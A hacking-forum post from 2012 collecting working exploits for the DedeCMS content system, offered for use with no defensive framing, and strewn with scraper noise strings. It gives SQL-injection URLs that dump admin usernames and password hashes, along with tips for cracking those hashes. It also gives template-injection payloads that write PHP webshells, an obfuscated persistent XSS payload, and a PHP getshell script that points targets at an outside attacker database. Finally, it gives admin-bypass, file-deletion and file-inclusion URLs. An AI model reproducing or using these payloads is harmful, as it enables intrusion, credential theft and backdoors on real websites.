中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]

作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结
/ X0 R; e4 q) ?6 X) |/ P/ r
Dedecms 5.6 rss注入漏洞
# W0 T; o1 |1 g1 l
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1# g! Q/ d) S" e; `5 @8 I+ S' {/ y

3 d/ ~; s& {3 O- b- i! B
* X/ L: {  g  f! ^" X5 ^; ?$ D$ G, O# |. Y( H0 e
/ `: P, \' K* O  J

+ L2 f9 {% G, ^: f3 N' k6 K. o) d
2 A+ U' V5 u+ ^, H: b/ r4 c, E
' i7 w+ r- o; t5 B6 I( h) n& k* X& J! j* G6 [
DedeCms v5.6 嵌入恶意代码执行漏洞7 t5 B% X' i3 t5 Z2 t
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}( [2 h. K3 `' q9 N: k! X5 o3 [
发表后查看或修改即可执行- N( a  `) }; J4 y* ^( i' s5 ]7 A
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}0 T4 p9 E. g, v5 Z1 U( j/ }
生成x.php 密码xiao,直接生成一句话。
- M; `  u( b# K% @5 ]4 M: N- l0 }
( k7 ]8 S& S5 b4 ]' N# z
# B5 n6 i" x# `0 d1 @( ?) @" _  U
8 a( G+ P: J% V; l

. J3 a' H3 j+ E; T$ U$ l
) a5 O; P% h" l' ?# f, k; h
( s2 A* w7 I8 ?8 Z; ?: r  l$ ^# B( a
3 h# G; F/ L  {/ Q% W0 zDede 5.6 GBK SQL注入漏洞/ j6 T  w/ b: o5 b  s
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';2 N. f5 N( _# W( h5 _1 Q6 k
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
# ]) j: ~& o5 @; }' |1 C# shttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
. [0 a( K( b. h, I# x% D) p. G7 {- ~# Z. n  H
- [4 e8 I$ s* y( w7 R

, a+ e% n- J% @: C
) q5 M7 E. @/ d. }8 L, V& k+ k  G' W/ F
* _3 {* U1 ^; C5 `3 J& L" }: ?

0 t5 U* _6 j/ Z( G8 w5 k- u$ S' I" D0 p5 R4 R! r- T2 e1 [6 t
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞9 X* V$ S; C4 r6 q5 t6 J5 _
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
7 @% V; v  }' i6 Y* B" b0 {( X! r" J! t  a+ u
/ `1 x# D6 B* d8 M5 l

% @) }; I; o' W2 A! C. H6 u/ o! N( b  c% D" ^8 Q9 Z: H: n6 _! Y
+ n+ A. j3 s, s9 f; z: R* d

3 \3 R+ W3 a( {: {" y: yDEDECMS 全版本 gotopage变量XSS漏洞
# ?4 C% W+ B) i) t1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 - d1 j7 M: B; _- S0 y( ]
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="+ f6 M: z7 b/ E

+ U# G8 O3 o0 {* Z
$ f8 \5 M. d0 Q# i$ o2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 : |; z" Q6 t/ |. k
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
9 T- C2 h- B7 F& g) K( @# i
% v4 @2 o1 F3 I! V+ d- D* M/ t% R; f; W4 M5 j
http://v57.demo.dedecms.com/dede/login.php
; g/ t9 l8 e2 q- N! ?  l4 {
3 D/ c- b* ^" r: I; [# K* v( |. t, t4 r' j
color=Red]DeDeCMS(织梦)变量覆盖getshell
$ N3 r9 H2 Z5 @#!usr/bin/php -w+ z6 v$ G& i; h4 |9 ?' ]. D* w: z
<?php* N3 S" M3 k4 x, a7 ?' V( p
error_reporting(E_ERROR);
, \4 @$ {% M8 q: N4 C9 |. uset_time_limit(0);, R, Y6 ]/ d4 V7 N( c: E" |
print_r('" P3 J4 G* k% d7 t' {
DEDEcms Variable Coverage
; i, j: s0 f8 r8 [$ X" `Exploit Author:
www.heixiaozi.comwww.webvul.com
6 k, G& x) @7 T2 h' I3 J);
, U( Q' k. T: H5 x/ Mecho "\r\n";, m. ^+ M! D( R* ^) E
if($argv[2]==null){
8 c# D1 I' y+ ?  eprint_r('  l7 ]" O; Z& c8 T
+---------------------------------------------------------------------------+' g. Z, l4 r* K  f
Usage: php '.$argv[0].' url aid path
0 o! D% a( W2 g7 k5 w9 s" Said=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/' L7 u8 @5 k) K2 K: a
Example:4 H# c; i$ [3 z5 T! K
php '.$argv[0].'
www.site.com 1 old  H( }/ ^8 z6 f; r( ?" ^, z
+---------------------------------------------------------------------------++ D9 O, |. I$ I/ D  b6 B
');
8 z: q) ^; a  c/ S' a' Jexit;& G: U$ B2 K" j* p
}3 \% ]7 x" z4 |0 l5 ?
$url=$argv[1];1 P! m' O: s: d% j$ W, h* @
$aid=$argv[2];
, e% V( |) Z$ n" K: I& m$path=$argv[3];
" t- T5 h+ c$ Z& g& u$exp=Getshell($url,$aid,$path);& J6 Q3 g. D' m5 a8 Y! {1 d4 z/ `
if (strpos($exp,"OK")>12){
& m% R3 b$ ?4 u: w- n: z; g1 g# \: gecho "
+ q/ N" ]+ s) X6 XExploit Success \n";, z6 v; A. d" l. Q  M+ k
if($aid==1)echo "
- j  S1 ?6 f6 G2 iShell:".$url."/$path/data/cache/fuck.php\n" ;9 F  u7 ]. _& T* _5 y0 q2 n, [8 J
% ]9 F- u1 b" F% \: W

7 h5 x% N8 z3 H6 x% Pif($aid==2)echo "
  N9 j7 w8 Y4 @6 _" iShell:".$url."/$path/fuck.php\n" ;- g1 \0 p1 J0 T9 Y! d2 u* N
7 j8 D0 b( O5 r7 s: `
+ n/ X( u3 P: G7 ^. ?
if($aid==3)echo "
" Z9 _1 S  B7 q$ t$ _) t, DShell:".$url."/$path/plus/fuck.php\n";
6 {* [! ?' T: X  u. p) ~# t
: O3 \3 ?' J4 d4 `$ w" I& H3 U9 D" k! z. E0 c1 b. i
}else{
9 n8 S5 r" \: |6 uecho "' Q4 ~* Z/ N( o7 v% d1 ?
Exploit Failed \n";
  z" d) ?  f: d6 ^% J- q}( i3 Q! e; W  ^0 q+ t
function Getshell($url,$aid,$path){- \5 t- S7 E+ f. p; h
$id=$aid;
1 y/ Y* y: Z1 `1 r$host=$url;
3 U& t, Z; C/ o$port="80";
8 ^" g( h' ]9 f2 D& G' X$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";+ t4 {, S, V/ X- D
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
8 f, Y2 D3 o3 a2 a$ z$data .= "Host: ".$host."\r\n";
5 y5 f. Q9 A$ K3 W- L$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
; l" H" [; |9 f4 e$ d6 X0 k* K$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
6 H4 A2 y( t" a$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
8 S# V: M' C# _: w* k. |: _5 R! R//$data .= "Accept-Encoding: gzip,deflate\r\n";; S9 H9 x8 ^* w9 n
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
5 N* j& n, X1 W' }2 T6 Z$data .= "Connection: keep-alive\r\n";& K* u9 S  D1 E6 `! L  u6 }& E
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";4 ~; z! K6 G1 D% C+ Y- s
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
4 P; E+ b3 p/ u$ F$data .= $content."\r\n";. D, ]5 ^- c/ {; Y. O5 R: [( A/ M
$ock=fsockopen($host,$port);5 U. p( ]  a$ V& B$ q( d
if (!$ock) {
% q; p+ A3 g+ ~3 U, S5 S# Secho "6 p# \& Y: W6 p9 _$ m, S$ z( s. r
No response from ".$host."\n";! \3 _* @' Y! q& _  v
}" X; `! ?/ G4 y$ d  G) f% F% P* i
fwrite($ock,$data);
( S4 m$ M# Q- |2 qwhile (!feof($ock)) {; l0 F2 ^' U) {
$exp=fgets($ock, 1024);: h+ H# v( Q: [- }4 y% e
return $exp;
, i  X/ t. k. f/ }6 i# E  S}
4 D" U7 ^0 U: C' {' e* `}- T2 k5 f) W* [( ]) a+ ^8 q

; p( u2 w' z/ u
# ^7 I+ r& V) X( ?4 S& O?>
6 p# C  X9 z2 }! H0 L- ]4 d8 `( r% n0 k3 ]

, f  M. K" q9 Q
6 Q! {* R( {7 z* K0 T6 }! ]; X" U. B, s' p1 J% I
' A& c+ o' G# }4 c3 [+ X
4 w- z1 F  j+ q6 A/ N
* ]7 x$ Z- A7 u( Q

" T" q$ L. R1 K% e8 l% W% T
+ Z2 }# a( m4 E
2 Q- V' F+ J5 G7 P1 GDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)1 B! q) w- z. `: D, e
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root( v- e1 z; ^9 V/ D- J& v

& R8 \& O5 m0 B- F2 J, n$ z* w" z
* S" m! [% F! z1 G把上面validate=dcug改为当前的验证码,即可直接进入网站后台8 _3 i& z5 ^- U- N0 w
9 f! T4 W) w$ l+ D+ v
  `3 }$ s+ ]5 w8 r0 J
此漏洞的前提是必须得到后台路径才能实现2 C6 m" ]' z( p6 y  T7 Z% A

" v! f/ s% d. k) Y1 c* H+ R
; @  n' x" |6 L3 ?0 u0 Z/ }
7 `1 y& Q( s/ H- B; V# h/ Q% R% @( k9 h

$ i8 `- [8 Q6 n9 Q, }$ V# k% n) p2 n& o; C1 H2 J; d: N  X, [
8 x* @4 s& K# n+ H- J

% h0 O) z1 C; d! A. f2 l+ m3 o5 t. L5 {9 d

! U8 X% D3 i& F+ V7 ~- f' }Dedecms织梦 标签远程文件写入漏洞9 y) I8 r0 i7 _/ Q, I1 e
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');1 {- T' T6 G" Z4 D8 U1 `- @+ M5 e
& m$ X: D* Q9 R3 W8 K0 Q4 m9 @% N8 d3 J
4 @4 F! j! p7 L3 K5 b7 H" Q, \. b  a3 F
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 , \) R7 ]4 b, E# s: `1 f/ V5 E, x0 p
<form action="" method="post" name="QuickSearch" id="QuickSearch">
0 _4 D5 S. [3 c( E  t1 r2 k<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
* `6 W0 ?0 |) `% J2 M<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />$ H( F' t" c5 C+ ~- Y
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
3 B( s2 [) d9 h" j# T<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />% w6 }# f2 O# L
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />$ L: j4 j5 h( n- _+ W
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
  }% P& Z' T- O, ~<input type="text" value="true" name="nocache" style="width:400">7 `4 Y( Q$ A, [- z# X3 u
<input type="submit" value="提交" name="QuickSearchBtn"><br />9 q  \* T& R, T! w7 w2 m2 m6 ]5 H, o% b
</form>; |8 M" E5 ]6 s6 d0 E
<script>
  A) d' Q% Q6 A5 bfunction addaction()
$ H& s9 g1 c, W  X- q{% Q. m- ]) `, R6 f
document.QuickSearch.action=document.QuickSearch.doaction.value;3 F& @# Q2 y# z9 d' h
}8 K- J7 `; N) Q( P
</script>8 C" U( f$ A  ]: {* L5 U6 m
1 {- U  R3 c& }; w7 T
3 F2 C$ j" I% X5 {
$ o: x1 m/ s( S* ^7 I+ _
7 L5 o  ]$ |# z& E" l9 r
9 C% ~5 @* Z3 Y

0 w7 @& T+ d6 @0 ]
7 S9 s) I1 r' X2 e( F1 m& J. v. Q2 q; Y, ^1 K

3 a% X. J2 O: _% \; V+ f; ]% A  r. Z( V/ l7 ?
DedeCms v5.6 嵌入恶意代码执行漏洞
+ X3 I/ ?! e( J注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
1 G! g8 w* d# S& V7 X$ H0 v3 Ga{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}% k3 a/ D$ _/ z5 j3 m
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得0 I- K; X& H: R' e, w3 U- [- N
Dedecms <= V5.6 Final模板执行漏洞( n. m1 b  d. c. ]! E
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
' w5 l5 @) g  A& yuploads/userup/2/12OMX04-15A.jpg
4 H% s5 R6 [, R
: R1 }, V. D/ @  N& Q/ Q: s% {4 B
$ K8 _- [$ r' Z0 O7 d& `模板内容是(如果限制图片格式,加gif89a):
0 T1 i# A- D. m+ O9 i: d{dede:name runphp='yes'}
9 g8 Q5 J% Y* u$fp = @fopen("1.php", 'a');
4 G1 l$ H% L  R$ T" r6 M@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
( h2 w+ i$ w# j, l@fclose($fp);
3 L* s0 T8 b! y' i8 ?{/dede:name}" b( {8 C! P% k( m0 C8 S& Q& r0 W
2 修改刚刚发表的文章,查看源文件,构造一个表单:
/ \: C% X3 M) h4 B<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
( v; T) _9 t" L0 ?- L0 k$ e<input type="hidden" name="dopost" value="save" />
' Q; ]2 `- ]8 e' c/ r! [9 s<input type="hidden" name="aid" value="2" />
: e- M! j4 F3 a9 d<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
8 t4 s2 L  j- T<input type="hidden" name="channelid" value="1" />: k: @% S% {: w& t* v
<input type="hidden" name="oldlitpic" value="" />  ]% |" m: E2 X; Q6 T* a
<input type="hidden" name="sortrank" value="1275972263" />1 N3 b' b: b3 ^. B, \2 f6 \

& [4 u) F5 G: ]) p( e% b7 W2 Q& x) _$ G: M" j. x
<div id="mainCp">0 M# g. y4 N& k. e+ k
<h3 class="meTitle"><strong>修改文章</strong></h3>. r0 A* d2 p0 z* g3 j4 `
2 k3 X& Q2 M8 U+ |

8 w- Q0 o8 a8 T8 I: Y6 g<div class="postForm">
9 M3 d! B. K, L- j# {$ U0 ~# j3 g<label>标题:</label>1 z3 t# x/ Q4 j4 p
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
( s/ }3 c( J* B+ x2 F" R( _! C: `& g& B( l
3 F0 u9 @! ~8 @9 _" U- w- O1 N1 J* h/ O( q" P; E; |6 D! L1 F
<label>标签TAG:</label>3 Z2 F/ O7 E& G- W2 m) u
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
' r% D4 w- j6 K5 w/ o! }! \$ }
1 E, p# K, G: t$ P1 ~* f8 G* F+ `
<label>作者:</label>
/ A( O+ a/ W6 j. I( ^' U& w; Z<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>: _. A' \3 H6 J

# _8 O! s( u& \# Y) A. b( F9 R% p9 O# k& b; H$ z0 w! H7 b/ h$ t' S
<label>隶属栏目:</label>
7 W' T1 \" H  s- l( Y5 l- V8 Y: Q<select name='typeid' size='1'>
4 M+ \8 j  L# ^: u) c, ~- Q, C<option value='1' class='option3' selected=''>测试栏目</option>
2 }. g3 u+ J& i  n</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
: z; x* r4 P  ^8 ~5 A: d1 E6 }/ y+ U8 c

) [. V9 X$ J4 q5 K7 e<label>我的分类:</label>4 w7 Q4 {  ~- v
<select name='mtypesid' size='1'>
; ^4 |! K6 I- X) P+ |+ {& `* m<option value='0' selected>请选择分类...</option>
1 E- y6 y4 g: e7 H+ [<option value='1' class='option3' selected>hahahha</option>1 o5 K& l) `( [- z- i" c; p
</select>  A0 f6 ?) v" r# R+ i
2 ^8 v4 S& o2 h1 L9 Z% i9 }& O
) _+ y% l/ p6 `8 t5 N1 [6 m
<label>信息摘要:</label>
% ]1 l2 y- M/ U! J- F2 e- _6 |<textarea name="description" id="description">1111111</textarea>' k0 T$ a+ ?' {1 h1 w
(内容的简要说明)3 V$ x- D. o) o. N+ W6 C8 t
' {4 N1 W' d9 M6 z2 J0 j: Z

, y, y2 Z& W! P' I+ J4 Z$ Q# Q<label>缩略图:</label>/ E8 Y" u6 Y" c. `
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
* R0 J& A5 i% T  d2 V
4 R* t! \# [' I) Z7 U6 E$ S, g8 J, k  B0 x- |8 d
<input type='text' name='templet'
) ?$ v* l+ a* ^( M# mvalue="../ uploads/userup/2/12OMX04-15A.jpg">& \6 H8 i/ I9 U' F) v' p
<input type='text' name='dede_addonfields'/ X, O. @% p7 T) B) o
value="templet,htmltext;">(这里构造)( q, i" t' g9 g' H
</div>  }0 Q0 P* @6 q, j3 ^5 r7 d% X

+ J- i9 m3 T. ]% j; V/ K4 l
3 s. c2 N) q% n7 A<!-- 表单操作区域 -->
" C$ Z2 q0 q5 e' `<h3 class="meTitle">详细内容</h3>  g" k/ L! l0 O* R
* I* f- F+ L4 L! p! j

0 }0 k0 [3 _: l# O* L<div class="contentShow postForm">& q& i& c# O  F, z% ?( L
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>( d3 F7 \( ^( }: I$ v3 F6 m

$ q9 N, H! g5 P8 c7 g2 w
( X9 q& i( _. g9 a<label>验证码:</label>, d0 T* W5 f3 n) a% K) S6 g' M/ T
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
+ [+ K* S! }% A$ c: M, N; b  A* p<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
5 X& q) K0 O$ p( J3 M: i
" R" e9 l  w4 n* |4 \4 a4 F8 J0 o
<button class="button2" type="submit">提交</button>+ B  Y- K. _; ~8 ?+ K4 F! [
<button class="button2 ml10" type="reset">重置</button>* i) V$ L$ D# {2 N, B  b
</div>. A* M+ B4 d7 W6 T; ^; Y. @

1 F4 L. c+ j4 Q9 [& K. g$ X
: |) I2 x- t, S</div>
5 X0 L4 Y/ u4 S" w% N1 X# k- \& T2 [* U2 r
  b5 k8 j) P+ v
</form>6 H9 |! i6 }" f2 @+ _8 S
3 L2 s, h3 ?. m0 W, E; j: {+ s

4 Q+ l' B8 I* l) w$ A+ V提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
7 V# Y3 `# z* Y5 b; l假设刚刚修改的文章的aid为2,则我们只需要访问:
' w6 l' d  u: N  M
http://127.0.0.1/dede/plus/view.php?aid=2
2 V6 E9 W5 f" ]* M0 Q- [9 W% [即可以在plus目录下生成webshell:1.php7 M5 \: J" U) O' b& t% B2 y
" y4 Q' x) m) E6 \7 X: N
: p1 @1 \, L7 G) o% j/ u
2 E1 y' B5 t6 J

. Z6 O: w+ ?5 o3 w2 ?( N0 {$ j7 I  n2 f* P

$ C1 W5 H9 J; g6 j" \* g5 W! I- A0 |- Z$ v  C; R& W' q6 |$ x' @
' w& i) Y. t! G, q
" |2 o0 T- q  h( U+ |7 C3 @
5 U% V9 @# G9 u' l" k1 Z3 [+ `

& A4 y) p2 s) z: L+ u9 E" I+ u  q% ~/ ~7 j
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)) L/ o5 g+ c; o. I9 |5 G2 o5 u
Gif89a{dede:field name='toby57' runphp='yes'}5 ~9 X1 @& z. z: r, }- {
phpinfo();
% a& _1 T, _: r6 q- S{/dede:field}
% s4 M. C' ^/ H& n6 F保存为1.gif
  ~# b; K3 L6 V! p; h<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">   D. I# p# ?/ W) b  Q6 N* M
<input type="hidden" name="aid" value="7" />
" ^2 ^7 X+ e' A  z: D# U<input type="hidden" name="mediatype" value="1" />
$ z4 W7 {3 c  L<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 1 J; _4 Y, D; m5 r
<input type="hidden" name="dopost" value="save" /> ! a. ^9 ?5 x; l& K+ G
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 1 f0 z! U( S; T& j: \4 n% z) d3 O
<input name="addonfile" type="file" id="addonfile"/> ; H  U& |! a# t/ @. a
<button class="button2" type="submit" >更改</button> 9 ~7 [) [! a/ \$ w
</form> 4 v0 J2 u3 V. D9 h! C, l) V
; [  Q' f. n0 O6 ^2 @' f5 Z5 ?

: o- g0 ]6 C0 ~构造如上表单,上传后图片保存为/uploads/userup/3/1.gif1 Z0 E$ O( N" E7 O, _
发表文章,然后构造修改表单如下:
; E, m/ ^) H! R) R8 i7 @
0 b3 V9 X% e0 A& M$ Y7 Y5 X- j7 Z. k9 Y) X7 c  l7 n
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
2 f9 z/ D  T% s( s& {<input type="hidden" name="dopost" value="save" />
" L, `; k8 q, [% f% g0 T7 I5 d<input type="hidden" name="aid" value="2" /> - t, K  W7 M3 q: @
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
$ b) L  k. q: t4 z) _<input type="hidden" name="channelid" value="1" />
/ u# G. L* K1 g( N0 ?<input type="hidden" name="oldlitpic" value="" /> 9 E$ I3 h$ w# Q# W8 S
<input type="hidden" name="sortrank" value="1282049150" />
7 T/ F" X7 B/ y3 y. t0 E2 r<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> % t6 `0 n( i9 b1 W+ p
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
5 }9 F3 X' S) q( |$ e<select name='typeid' size='1'>
! L) X  V7 j0 D; B<option value='1' class='option3' selected=''>Test</option> # j* Q' c* e) V! r9 O9 o
<select name='mtypesid' size='1'>
' _7 s* e: N! e- h1 `* _- \. x2 h<option value='0' selected>请选择分类...</option> % r& Z& E. v% ~( ^" S" [6 ^" o
<option value='1' class='option3' selected>aa</option></select>
9 J2 k7 |% f4 T6 B<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> . K4 Q8 n( J  T" h  O# ~
<input type='hidden' name='dede_addonfields' value="templet"> 0 P, K5 `" t% L4 G/ M8 @9 y4 S; R
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
) f  s% s  Z8 n9 Y. C<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
9 L/ x& ?9 L; G' P% T<button class="button2" type="submit">提交</button>
$ [* _* i2 E- Y% L+ i</form>
0 A  X, Y9 n8 A+ m, z8 l, v: R; A9 ^
( I: `: `( ]' v+ h

6 H8 F; ]9 C3 ~$ z5 |( U
: I' h- z) N7 p! v2 c, U" j5 l! d0 o2 X$ |' `, h) F: n
0 s) K! U& O6 x, L9 m9 o
8 \, f" W; t% p4 n; O
; R# z2 j  n3 S2 w7 l$ L
+ ~' W- R5 |4 z0 J/ w

" w) q7 A7 ^" t
, u$ B" @, S* |, ]
7 T+ I: c! t$ x& D  Y织梦(Dedecms)V5.6 远程文件删除漏洞
4 G" E: l0 [0 A  r! m
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
! x( ?" b+ m' e5 G' F- X, R
9 d# J0 q  B8 |5 W$ l1 F( {1 }: e4 I) R: d4 O' i( p: \) ]
2 a' |7 ^9 I5 A  S# F: w: z
" c. }" Q. f; f7 Q5 G. x
  x. V( w& B0 r% f! H0 r" h/ c. z

+ m( A; i5 j% U7 @- X/ t& K) ~5 p2 c, w
  A3 q" T4 Q- j5 e0 Q

) t) a0 I9 V+ _; x7 @4 @
& s7 q* u! T2 B: d% U; W织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 : M( U2 r, |! O; V
http://www.test.com/plus/carbuya ... urn&code=../../
% F! B9 l( d/ C* m0 r, y( R1 E0 ~4 Q  ^0 s

) }$ ?$ @; M# ~  A8 M) Z( A$ j# f
2 X1 ^( r# h  c1 m* A9 k! g" k% \5 e4 c  m. S' ~* a
: n$ O  {2 l4 w; y& k

/ N) p- A! _7 N( @! t* n9 ^) i0 M" T" ?! M

3 A0 h( L, A: H2 U5 }7 I3 F3 r* X  d0 F  F; Y' _$ |% q' f

: M, V% _/ i' w' I. rDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
; n( ?5 @. G; gplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`8 Y2 K% K) O; [8 f
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD59 K! w5 s- h9 O# r3 a& h+ U

2 K+ L+ ], V# l: M3 y8 v, |" s9 r  j: J+ o8 R& M
* o7 m& b9 q6 P: ~4 e9 v: |4 l: {

, X2 _  c0 Q+ [, o3 s4 f) C
( J' K- S  C, O( A" t! \5 X6 D% B! N0 s/ Z8 m, |. L% `7 Z

/ H6 k$ ^+ T) T$ S+ j
- L: G! }% W& A  Y. f, |/ M, A3 W# M* `! O) r

2 ^! ]" p, ~# r# f8 U# |; x织梦(Dedecms) 5.1 feedback_js.php 注入漏洞; \3 T- x4 ^* I- W; v1 `0 W; X
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
% ?7 V, a/ W8 J( B! ~
8 }; c. ]$ L. d* I; Q' \/ k4 @/ L2 }6 o% k

; H1 p& f4 V1 x  S; U3 ^/ q  G: [9 E8 E* B! t# i' o! R
% W/ c: T  T) A7 s/ i

6 q: v9 o% _) i; Q) G
